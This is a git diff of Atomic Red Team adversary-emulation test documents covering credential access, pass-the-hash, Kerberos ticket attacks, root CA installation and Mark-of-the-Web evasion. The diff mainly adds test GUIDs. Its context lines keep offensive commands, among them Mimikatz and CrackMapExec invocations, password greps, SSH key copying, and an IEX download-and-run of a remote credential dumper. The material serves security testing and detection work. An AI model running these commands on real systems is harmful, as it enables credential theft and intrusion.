## Atomic Test #1 - Sudo usage -Common Sudo enumeration methods. +auto_generated_guid: 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e + +Common Sudo enumeration methods. **Supported Platforms:** macOS, Linux @@ -48,8 +50,10 @@ sudo vim /etc/sudoers
## Atomic Test #2 - Unlimited sudo cache timeout -Sets sudo caching timestamp_timeout to a value for unlimited. This is dangerous to modify without using 'visudo', do not do this on a production system. +auto_generated_guid: a7b17659-dd5e-46f7-b7d1-e6792c91d0bc + +Sets sudo caching timestamp_timeout to a value for unlimited. This is dangerous to modify without using 'visudo', do not do this on a production system. **Supported Platforms:** macOS, Linux @@ -73,8 +77,10 @@ sudo visudo -c -f /etc/sudoers
## Atomic Test #3 - Disable tty_tickets for sudo caching -Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using 'visudo', do not do this on a production system. +auto_generated_guid: 91a60b03-fb75-4d24-a42e-2eb8956e8de1 + +Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using 'visudo', do not do this on a production system. **Supported Platforms:** macOS, Linux diff --git a/atomics/T1550.002/T1550.002.md b/atomics/T1550.002/T1550.002.md index 3b5dc5f3..1c8d7ebe 100644 --- a/atomics/T1550.002/T1550.002.md +++ b/atomics/T1550.002/T1550.002.md @@ -16,16 +16,18 @@ Adversaries may also use stolen password hashes to "overpass the hash." Similar
## Atomic Test #1 - Mimikatz Pass the Hash + +auto_generated_guid: ec23cef9-27d9-46e4-a68d-6f75f7b86908 + Note: must dump hashes first [Reference](https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#pth) - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | user_name | username | string | Administrator| | ntlm | ntlm hash | string | cc36cf7a8514893efccd3324464tkg1a| @@ -48,7 +50,7 @@ Note: must dump hashes first ##### Check Prereq Commands: ```powershell $mimikatz_path = cmd /c echo #{mimikatz_path} -if (Test-Path $mimikatz_path) {exit 0} else {exit 1} +if (Test-Path $mimikatz_path) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -66,15 +68,17 @@ Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
## Atomic Test #2 - crackmapexec Pass the Hash -command execute with crackmapexec +auto_generated_guid: eb05b028-16c8-4ad8-adea-6f5b219da9a9 + +command execute with crackmapexec **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | user_name | username | string | Administrator| | crackmapexec_exe | crackmapexec windows executable | Path | C:\CrackMapExecWin\crackmapexec.exe| @@ -97,7 +101,7 @@ crackmapexec #{domain} -u #{user_name} -H #{ntlm} -x #{command} ##### Description: CrackMapExec executor must exist on disk at specified location (#{crackmapexec_exe}) ##### Check Prereq Commands: ```powershell -if(Test-Path #{crackmapexec_exe}) { 0 } else { -1 } +if(Test-Path #{crackmapexec_exe}) { 0 } else { -1 } ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1550.003/T1550.003.md b/atomics/T1550.003/T1550.003.md index 8c4fc94d..4b9d9a7b 100644 --- a/atomics/T1550.003/T1550.003.md +++ b/atomics/T1550.003/T1550.003.md @@ -18,15 +18,17 @@ Adversaries may also create a valid Kerberos ticket using other user information
## Atomic Test #1 - Mimikatz Kerberos Ticket Attack -Similar to PTH, but attacking Kerberos +auto_generated_guid: dbf38128-7ba7-4776-bedf-cc2eed432098 + +Similar to PTH, but attacking Kerberos **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | user_name | username | string | Administrator| | domain | domain | string | atomic.local| @@ -47,7 +49,7 @@ Similar to PTH, but attacking Kerberos ##### Description: Mimikatz must exist on disk at specified location (#{mimikatz_exe}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} +if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1552.001/T1552.001.md b/atomics/T1552.001/T1552.001.md index 33589071..edb84410 100644 --- a/atomics/T1552.001/T1552.001.md +++ b/atomics/T1552.001/T1552.001.md @@ -22,8 +22,10 @@ In cloud and/or containerized environments, authenticated user and service accou
## Atomic Test #1 - Extract Browser and System credentials with LaZagne -[LaZagne Source](https://github.com/AlessandroZ/LaZagne) +auto_generated_guid: 9e507bb8-1d30-4e3b-a49b-cb5727d7ea79 + +[LaZagne Source](https://github.com/AlessandroZ/LaZagne) **Supported Platforms:** macOS @@ -46,15 +48,17 @@ python2 laZagne.py all
## Atomic Test #2 - Extract passwords with grep -Extracting credentials from files +auto_generated_guid: bd4cf0d1-7646-474e-8610-78ccf5a097c4 + +Extracting credentials from files **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_path | Path to search | String | /| @@ -75,8 +79,10 @@ grep -ri password #{file_path}
## Atomic Test #3 - Extracting passwords with findstr -Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed. +auto_generated_guid: 0e56bf29-ff49-4ea5-9af4-3b81283fd513 + +Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed. **Supported Platforms:** Windows @@ -100,9 +106,11 @@ ls -R | select-string -Pattern password
## Atomic Test #4 - Access unattend.xml + +auto_generated_guid: 367d4004-5fc0-446d-823f-960c74ae52c3 + Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process. - **Supported Platforms:** Windows @@ -126,8 +134,10 @@ type C:\Windows\Panther\Unattend\unattend.xml
## Atomic Test #5 - Find and Access Github Credentials -This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found. +auto_generated_guid: da4f751a-020b-40d7-b9ff-d433b7799803 + +This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found. **Supported Platforms:** macOS, Linux diff --git a/atomics/T1552.002/T1552.002.md b/atomics/T1552.002/T1552.002.md index ceefc502..4dcc1d70 100644 --- a/atomics/T1552.002/T1552.002.md +++ b/atomics/T1552.002/T1552.002.md @@ -17,8 +17,10 @@ Example commands to find Registry keys related to password information: (Citatio
## Atomic Test #1 - Enumeration for Credentials in Registry -Queries to enumerate for credentials in the Registry. Upon execution, any registry key containing the word "password" will be displayed. +auto_generated_guid: b6ec082c-7384-46b3-a111-9a9b8b14e5e7 + +Queries to enumerate for credentials in the Registry. Upon execution, any registry key containing the word "password" will be displayed. **Supported Platforms:** Windows @@ -42,9 +44,11 @@ reg query HKCU /f password /t REG_SZ /s
## Atomic Test #2 - Enumeration for PuTTY Credentials in Registry + +auto_generated_guid: af197fd7-e868-448e-9bd5-05d1bcd9d9e5 + Queries to enumerate for PuTTY credentials in the Registry. PuTTY must be installed for this test to work. If any registry entries are found, they will be displayed. - **Supported Platforms:** Windows diff --git a/atomics/T1552.003/T1552.003.md b/atomics/T1552.003/T1552.003.md index 61a5049e..eecb4da5 100644 --- a/atomics/T1552.003/T1552.003.md +++ b/atomics/T1552.003/T1552.003.md @@ -10,15 +10,17 @@
## Atomic Test #1 - Search Through Bash History -Search through bash history for specifice commands we want to capture +auto_generated_guid: 3cfde62b-7c33-4b26-a61e-755d6131c8ce + +Search through bash history for specifice commands we want to capture **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path where captured results will be placed | Path | ~/loot.txt| | bash_history_grep_args | grep arguments that filter out specific commands we want to capture | Path | -e '-p ' -e 'pass' -e 'ssh'| diff --git a/atomics/T1552.004/T1552.004.md b/atomics/T1552.004/T1552.004.md index d9eb8d26..2f1e6642 100644 --- a/atomics/T1552.004/T1552.004.md +++ b/atomics/T1552.004/T1552.004.md @@ -22,9 +22,11 @@ Some private keys require a password or passphrase for operation, so an adversar
## Atomic Test #1 - Private Keys + +auto_generated_guid: 520ce462-7ca7-441e-b5a5-f8347f632696 + Find private keys on the Windows file system. File extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, pfx, .cer, .p7b, .asc - **Supported Platforms:** Windows @@ -47,15 +49,17 @@ dir c:\ /b /s .key | findstr /e .key
## Atomic Test #2 - Discover Private SSH Keys -Discover private SSH keys on a macOS or Linux system. +auto_generated_guid: 46959285-906d-40fa-9437-5a439accd878 + +Discover private SSH keys on a macOS or Linux system. **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | search_path | Path where to start searching from. | path | /| | output_file | Output file containing locations of SSH key files | path | /tmp/keyfile_locations.txt| @@ -82,15 +86,17 @@ rm #{output_file}
## Atomic Test #3 - Copy Private SSH Keys with CP -Copy private SSH keys on a Linux system to a staging folder using the `cp` command. +auto_generated_guid: 7c247dc7-5128-4643-907b-73a76d9135c3 + +Copy private SSH keys on a Linux system to a staging folder using the `cp` command. **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | search_path | Path where to start searching from. | path | /| | output_folder | Output folder containing copies of SSH private key files | path | /tmp/art-staging| @@ -118,15 +124,17 @@ rm #{output_folder}
## Atomic Test #4 - Copy Private SSH Keys with rsync -Copy private SSH keys on a Linux or macOS system to a staging folder using the `rsync` command. +auto_generated_guid: 864bb0b2-6bb5-489a-b43b-a77b3a16d68a + +Copy private SSH keys on a Linux or macOS system to a staging folder using the `rsync` command. **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | search_path | Path where to start searching from. | path | /| | output_folder | Output folder containing copies of SSH private key files | path | /tmp/art-staging| diff --git a/atomics/T1552.006/T1552.006.md b/atomics/T1552.006/T1552.006.md index 1fea602a..dbbe2d71 100644 --- a/atomics/T1552.006/T1552.006.md +++ b/atomics/T1552.006/T1552.006.md @@ -23,8 +23,10 @@ On the SYSVOL share, adversaries may use the following command to enumerate pote
## Atomic Test #1 - GPP Passwords (findstr) -Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt on Kali Linux. +auto_generated_guid: 870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f + +Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt on Kali Linux. **Supported Platforms:** Windows @@ -45,7 +47,7 @@ findstr /S cpassword %logonserver%\sysvol\*.xml ##### Description: Computer must be domain joined ##### Check Prereq Commands: ```powershell -if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} +if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -59,19 +61,21 @@ Write-Host Joining this computer to a domain must be done manually
## Atomic Test #2 - GPP Passwords (Get-GPPPassword) + +auto_generated_guid: e9584f82-322c-474a-b831-940fd8b4455c + Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This test is intended to be run from a domain joined workstation, not on the Domain Controller itself. The Get-GPPPasswords.ps1 executed during this test can be obtained using the get-prereq_commands. Successful test execution will either display the credentials found in the GPP files or indicate "No preference files found". - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | gpp_script_url | URL of the Get-GPPPassword PowerShell Script | url | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/87630cac639f29c2adcb163f661f02890adf4bdd/Exfiltration/Get-GPPPassword.ps1| | gpp_script_path | Path to the Get-GPPPassword PowerShell Script | Path | PathToAtomicsFolder\T1552.006\src\Get-GPPPassword.ps1| @@ -92,7 +96,7 @@ Get-GPPPassword -Verbose ##### Description: Get-GPPPassword PowerShell Script must exist at #{gpp_script_path} ##### Check Prereq Commands: ```powershell -if(Test-Path "#{gpp_script_path}") {exit 0 } else {exit 1 } +if(Test-Path "#{gpp_script_path}") {exit 0 } else {exit 1 } ``` ##### Get Prereq Commands: ```powershell @@ -102,7 +106,7 @@ Invoke-WebRequest #{gpp_script_url} -OutFile "#{gpp_script_path}" ##### Description: Computer must be domain joined ##### Check Prereq Commands: ```powershell -if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} +if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1552.007/T1552.007.md b/atomics/T1552.007/T1552.007.md index 150c669b..d0d3f03b 100644 --- a/atomics/T1552.007/T1552.007.md +++ b/atomics/T1552.007/T1552.007.md @@ -14,15 +14,17 @@ An adversary may access the Docker API to collect logs that contain credentials
## Atomic Test #1 - ListSecrets -A Kubernetes secret is an object that lets users store and manage sensitive information, such as passwords and connection strings in the cluster. Secrets can be consumed by reference in the pod configuration. Attackers who have permissions to retrieve the secrets from the API server (by using the pod service account, for example) can access sensitive information that might include credentials to various services. +auto_generated_guid: 43c3a49d-d15c-45e6-b303-f6e177e44a9a + +A Kubernetes secret is an object that lets users store and manage sensitive information, such as passwords and connection strings in the cluster. Secrets can be consumed by reference in the pod configuration. Attackers who have permissions to retrieve the secrets from the API server (by using the pod service account, for example) can access sensitive information that might include credentials to various services. **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | namespace | K8s namespace to list | String | default| @@ -43,8 +45,10 @@ kubectl get secrets -n #{namespace}
## Atomic Test #2 - Cat the contents of a Kubernetes service account token file -Access the Kubernetes service account access token stored within a container in a cluster. +auto_generated_guid: 788e0019-a483-45da-bcfe-96353d46820f + +Access the Kubernetes service account access token stored within a container in a cluster. **Supported Platforms:** Linux @@ -69,7 +73,7 @@ kubectl --context kind-atomic-cluster delete pod atomic-pod ##### Description: Verify docker is installed. ##### Check Prereq Commands: ```sh -which docker +which docker ``` ##### Get Prereq Commands: ```sh @@ -78,7 +82,7 @@ if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt ##### Description: Verify docker service is running. ##### Check Prereq Commands: ```sh -sudo systemctl status docker +sudo systemctl status docker ``` ##### Get Prereq Commands: ```sh @@ -87,7 +91,7 @@ sudo systemctl start docker ##### Description: Verify kind is in the path. ##### Check Prereq Commands: ```sh -which kind +which kind ``` ##### Get Prereq Commands: ```sh @@ -98,7 +102,7 @@ mv kind /usr/bin/kind ##### Description: Verify kind-atomic-cluster is created ##### Check Prereq Commands: ```sh -sudo kind get clusters +sudo kind get clusters ``` ##### Get Prereq Commands: ```sh @@ -107,7 +111,7 @@ sudo kind create cluster --name atomic-cluster ##### Description: Verify kubectl is in path ##### Check Prereq Commands: ```sh -which kubectl +which kubectl ``` ##### Get Prereq Commands: ```sh @@ -118,7 +122,7 @@ mv kubectl /usr/bin/kubectl ##### Description: Verify atomic-pod is running. ##### Check Prereq Commands: ```sh -kubectl --context kind-atomic-cluster get pods |grep atomic-pod +kubectl --context kind-atomic-cluster get pods |grep atomic-pod ``` ##### Get Prereq Commands: ```sh diff --git a/atomics/T1553.001/T1553.001.md b/atomics/T1553.001/T1553.001.md index 93bc43cf..380c0107 100644 --- a/atomics/T1553.001/T1553.001.md +++ b/atomics/T1553.001/T1553.001.md @@ -14,15 +14,17 @@ In typical operation, a file will be downloaded from the internet and given a qu
## Atomic Test #1 - Gatekeeper Bypass -Gatekeeper Bypass via command line +auto_generated_guid: fb3d46c6-9480-4803-8d7d-ce676e1f1a9b + +Gatekeeper Bypass via command line **Supported Platforms:** macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | app_path | Path to app to be used | Path | myapp.app| diff --git a/atomics/T1553.004/T1553.004.md b/atomics/T1553.004/T1553.004.md index c17ef4a6..182abaad 100644 --- a/atomics/T1553.004/T1553.004.md +++ b/atomics/T1553.004/T1553.004.md @@ -26,15 +26,17 @@ In macOS, the Ay MaMi malware uses /usr/bin/security add-trusted-cert -d -
## Atomic Test #1 - Install root CA on CentOS/RHEL -Creates a root CA with openssl +auto_generated_guid: 9c096ec4-fd42-419d-a762-d64cc950627e + +Creates a root CA with openssl **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | cert_filename | Path of the CA certificate we create | Path | rootCA.crt| | key_filename | Key we create that is used to create the CA certificate | Path | rootCA.key| @@ -65,15 +67,17 @@ fi
## Atomic Test #2 - Install root CA on Debian/Ubuntu -Creates a root CA with openssl +auto_generated_guid: 53bcf8a0-1549-4b85-b919-010c56d724ff + +Creates a root CA with openssl **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | cert_filename | CA file name | Path | rootCA.crt| | key_filename | Key we create that is used to create the CA certificate | Path | rootCA.key| @@ -94,7 +98,7 @@ echo sudo update-ca-certificates ##### Description: Verify the certificate exists. It generates if not on disk. ##### Check Prereq Commands: ```sh -if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi; +if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi; ``` ##### Get Prereq Commands: ```sh @@ -109,15 +113,17 @@ openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=U
## Atomic Test #3 - Install root CA on macOS -Creates a root CA with openssl +auto_generated_guid: cc4a0b8c-426f-40ff-9426-4e10e5bf4c49 + +Creates a root CA with openssl **Supported Platforms:** macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | cert_filename | CA file name | Path | rootCA.crt| | key_filename | Key we create that is used to create the CA certificate | Path | rootCA.key| @@ -137,7 +143,7 @@ sudo security add-trusted-cert -d -r trustRoot -k "/Library/Keychains/System.key ##### Description: Verify the certificate exists. It generates if not on disk. ##### Check Prereq Commands: ```sh -if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi; +if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi; ``` ##### Get Prereq Commands: ```sh @@ -152,15 +158,17 @@ openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=U
## Atomic Test #4 - Install root CA on Windows -Creates a root CA with Powershell +auto_generated_guid: 76f49d86-5eb1-461a-a032-a480f86652f1 + +Creates a root CA with Powershell **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | pfx_path | Path of the certificate | Path | rootCA.cer| @@ -191,7 +199,7 @@ catch { ##### Description: Verify the certificate exists. It generates if not on disk. ##### Check Prereq Commands: ```powershell -if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 } +if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 } ``` ##### Get Prereq Commands: ```powershell @@ -207,15 +215,17 @@ Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) | Remove-Item
## Atomic Test #5 - Install root CA on Windows with certutil -Creates a root CA with certutil +auto_generated_guid: 5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f + +Creates a root CA with certutil **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | pfx_path | Path of the certificate | Path | $env:Temp\rootCA2.cer| @@ -240,7 +250,7 @@ Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) -ErrorAction Ignore | ##### Description: Certificate must exist at specified location (#{pfx_path}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 } +if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 } ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1553.005/T1553.005.md b/atomics/T1553.005/T1553.005.md index f80a754a..fc2bed9c 100644 --- a/atomics/T1553.005/T1553.005.md +++ b/atomics/T1553.005/T1553.005.md @@ -14,15 +14,17 @@ Adversaries may abuse container files such as compressed/archive (.arj, .gzip) a
## Atomic Test #1 - Mount ISO image -Mounts ISO image downloaded from internet to evade Mark-of-the-Web. Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, and mount the image. The provided sample ISO simply has a Reports shortcut file in it. Reference: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/ +auto_generated_guid: 002cca30-4778-4891-878a-aaffcfa502fa + +Mounts ISO image downloaded from internet to evade Mark-of-the-Web. Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, and mount the image. The provided sample ISO simply has a Reports shortcut file in it. Reference: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/ **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | path_of_iso | Path to ISO file | path | PathToAtomicsFolder\T1553.005\bin\T1553.005.iso| @@ -45,7 +47,7 @@ Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null ##### Description: T1553.005.iso must exist on disk at specified location (#{path_of_iso}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{path_of_iso}) {exit 0} else {exit 1} +if (Test-Path #{path_of_iso}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -60,17 +62,19 @@ Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/
## Atomic Test #2 - Mount an ISO image and run executable from the ISO + +auto_generated_guid: 42f22b00-0242-4afc-a61b-0da05041f9cc + Mounts an ISO image downloaded from internet to evade Mark-of-the-Web and run hello.exe executable from the ISO. Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, mount the image, and run the executable from the ISO image that will open command prompt echoing "Hello, World!". ISO provided by:https://twitter.com/mattifestation/status/1398323532988399620 Reference:https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/, - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | path_of_iso | Path to ISO file | path | PathToAtomicsFolder\T1553.005\bin\FeelTheBurn.iso| @@ -96,7 +100,7 @@ Stop-process -name "hello" -Force -ErrorAction ignore ##### Description: FeelTheBurn.iso must exist on disk at specified location (#{path_of_iso}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{path_of_iso}) {exit 0} else {exit 1} +if (Test-Path #{path_of_iso}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1555.001/T1555.001.md b/atomics/T1555.001/T1555.001.md index 4639ef46..bdc572de 100644 --- a/atomics/T1555.001/T1555.001.md +++ b/atomics/T1555.001/T1555.001.md @@ -12,6 +12,9 @@ To manage their credentials, users have to use additional credentials to access
## Atomic Test #1 - Keychain + +auto_generated_guid: 1864fdec-ff86-4452-8c30-f12507582a93 + ### Keychain Files ~/Library/Keychains/ @@ -23,14 +26,13 @@ To manage their credentials, users have to use additional credentials to access [Security Reference](https://developer.apple.com/legacy/library/documentation/Darwin/Reference/ManPages/man1/security.1.html) [Keychain dumper](https://github.com/juuso/keychaindump) - **Supported Platforms:** macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | cert_export | Specify the path of the certificates to export. | path | /tmp/certs.pem| diff --git a/atomics/T1555.003/T1555.003.md b/atomics/T1555.003/T1555.003.md index c246dec0..b460c84c 100644 --- a/atomics/T1555.003/T1555.003.md +++ b/atomics/T1555.003/T1555.003.md @@ -22,19 +22,21 @@ After acquiring credentials from web browsers, adversaries may attempt to recycl
## Atomic Test #1 - Run Chrome-password Collector + +auto_generated_guid: 8c05b133-d438-47ca-a630-19cc464c4622 + A modified sysinternals suite will be downloaded and staged. The Chrome-password collector, renamed accesschk.exe, will then be executed from #{file_path}. Successful execution will produce stdout message stating "Copying db ... passwordsDB DB Opened. statement prepare DB connection closed properly". Upon completion, final output will be a file modification of $env:TEMP\sysinternals\passwordsdb. Adapted from [MITRE ATTACK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/credential-access/e7cab9bb-3e3a-4d93-99cc-3593c1dc8c6d.yml) - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_path | File path for modified Sysinternals | String | $env:TEMP| @@ -58,7 +60,7 @@ Remove-Item #{file_path}\Sysinternals -Force -Recurse -ErrorAction Ignore ##### Description: Modified Sysinternals must be located at #{file_path} ##### Check Prereq Commands: ```powershell -if (Test-Path #{file_path}\SysInternals) {exit 0} else {exit 1} +if (Test-Path #{file_path}\SysInternals) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -75,17 +77,19 @@ Remove-Item #{file_path}\Modified-SysInternalsSuite.zip -Force
## Atomic Test #2 - Search macOS Safari Cookies + +auto_generated_guid: c1402f7b-67ca-43a8-b5f3-3143abedc01b + This test uses `grep` to search a macOS Safari binaryCookies file for specified values. This was used by CookieMiner malware. Upon successful execution, MacOS shell will cd to `~/Libraries/Cookies` and grep for `Cookies.binarycookies`. - **Supported Platforms:** macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | search_string | String to search Safari cookies to find. | string | coinbase| @@ -107,16 +111,18 @@ grep -q "#{search_string}" "Cookies.binarycookies"
## Atomic Test #3 - LaZagne - Credentials from Browser + +auto_generated_guid: 9a2915b3-3954-4cce-8c76-00fbf4dbd014 + The following Atomic test utilizes [LaZagne](https://github.com/AlessandroZ/LaZagne) to extract passwords from browsers on the Windows operating system. LaZagne is an open source application used to retrieve passwords stored on a local computer. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | lazagne_path | Path to LaZagne | Path | PathToAtomicsFolder\T1555.003\bin\LaZagne.exe| @@ -135,7 +141,7 @@ LaZagne is an open source application used to retrieve passwords stored on a loc ##### Description: LaZagne.exe must exist on disk at specified location (#{lazagne_path}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{lazagne_path}) {exit 0} else {exit 1} +if (Test-Path #{lazagne_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1555/T1555.md b/atomics/T1555/T1555.md index a1251039..3e333580 100644 --- a/atomics/T1555/T1555.md +++ b/atomics/T1555/T1555.md @@ -14,9 +14,11 @@
## Atomic Test #1 - Extract Windows Credential Manager via VBA + +auto_generated_guid: 234f9b7c-b53d-4f32-897b-b880a6c9ea7b + This module will extract the credentials found within the Windows credential manager and dump them to $env:TEMP\windows-credentials.txt - **Supported Platforms:** Windows @@ -48,7 +50,7 @@ try { $process = "winword" Stop-Process -Name $process exit 0 -} catch { exit 1 } +} catch { exit 1 } ``` ##### Get Prereq Commands: ```powershell @@ -62,8 +64,10 @@ Write-Host "You will need to install Microsoft Word manually to meet this requir
## Atomic Test #2 - Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] -This module will extract the credentials from Windows Credential Manager +auto_generated_guid: c89becbe-1758-4e7d-a0f4-97d2188a23e3 + +This module will extract the credentials from Windows Credential Manager **Supported Platforms:** Windows @@ -86,8 +90,10 @@ IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/
## Atomic Test #3 - Dump credentials from Windows Credential Manager With PowerShell [web Credentials] -This module will extract the credentials from Windows Credential Manager +auto_generated_guid: 8fd5a296-6772-4766-9991-ff4e92af7240 + +This module will extract the credentials from Windows Credential Manager **Supported Platforms:** Windows diff --git a/atomics/T1556.002/T1556.002.md b/atomics/T1556.002/T1556.002.md index a8dcd535..807c98bc 100644 --- a/atomics/T1556.002/T1556.002.md +++ b/atomics/T1556.002/T1556.002.md @@ -14,15 +14,17 @@ Adversaries can register malicious password filters to harvest credentials from
## Atomic Test #1 - Install and Register Password Filter DLL -Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges. +auto_generated_guid: a7961770-beb5-4134-9674-83d7e1fa865c + +Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | input_dll | Path to DLL to be installed and registered | Path | PathToAtomicsFolder\T1556.002\src\AtomicPasswordFilter.dll| @@ -46,7 +48,7 @@ Restart-Computer -Confirm ##### Description: AtomicPasswordFilter.dll must exist on disk at specified location (#{input_dll}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{input_dll}) {exit 0} else {exit 1} +if (Test-Path #{input_dll}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1558.001/T1558.001.md b/atomics/T1558.001/T1558.001.md index 26058d91..ba58dac9 100644 --- a/atomics/T1558.001/T1558.001.md +++ b/atomics/T1558.001/T1558.001.md @@ -14,17 +14,19 @@ The KDC service runs all on domain controllers that are part of an Active Direct
